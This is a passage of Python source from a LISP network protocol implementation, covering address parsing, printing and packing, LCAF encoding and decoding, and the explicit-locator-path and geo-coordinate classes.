self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
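    #
    # A brief hedged illustration (values only, per the RFC 1918 checks
    # above): 10.1.2.3, 172.16.0.1, and 192.168.1.1 return True; other IPv4
    # addresses and all non-IPv4 addresses return False.
    #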
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because when "L" is used,
# it was producing 8 bytes in struct.pack().
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = b""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += (self.address + "\0").encode()
#endif
return(packet)
#enddef
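    #
    # A hedged example of pack_address() for IPv4 (byte values shown for
    # illustration only): address 10.0.0.1 packs in network byte order as
    # the four bytes 0a 00 00 01.
    #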
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order byte with zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
# There will be a common IPv6 address input mistake that will
# occur. The address ff::/8 (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
            # Allow the user to specify ff::/8, which allows for placing the
# byte in the high-order byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
if (self.mask_len < 0): return
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
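    #
    # A hedged example of zero_host_bits() (values are illustrative): for the
    # IPv4 prefix 10.1.1.77/24 the mask is 0xffffff00, so the stored address
    # becomes 10.1.1.0.
    #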
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
            #endif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
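    #
    # A hedged example of print_sg() output (addresses are illustrative):
    # source [1000]1.1.1.1/32 with group [1000]224.1.1.1/32 prints as
    # "[1000](1.1.1.1/32, 224.1.1.1/32)".
    #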
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
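    #
    # A hedged example of is_more_specific() (prefixes are illustrative):
    # [1000]10.1.1.0/24 is more-specific than [1000]10.0.0.0/8, and any
    # prefix is more-specific than the ultimate-root [*].
    #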
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
        # Get AFI and group address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node(object):
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
elp_node.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp(object):
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
        # If we did not find a match, this is possibly an ITR. We need to give
        # it the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
class lisp_geo(object):
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
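    #
    # A hedged example of the geo string format parsed above (values are
    # illustrative): "37-24-30-N-122-5-10-W-50/100" means 37 degrees 24
    # minutes 30 seconds North, 122 degrees 5 minutes 10 seconds West,
    # altitude 50, with a radius of 100 (kilometers, as compared by
    # point_in_circle() below).
    #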
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == "" or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
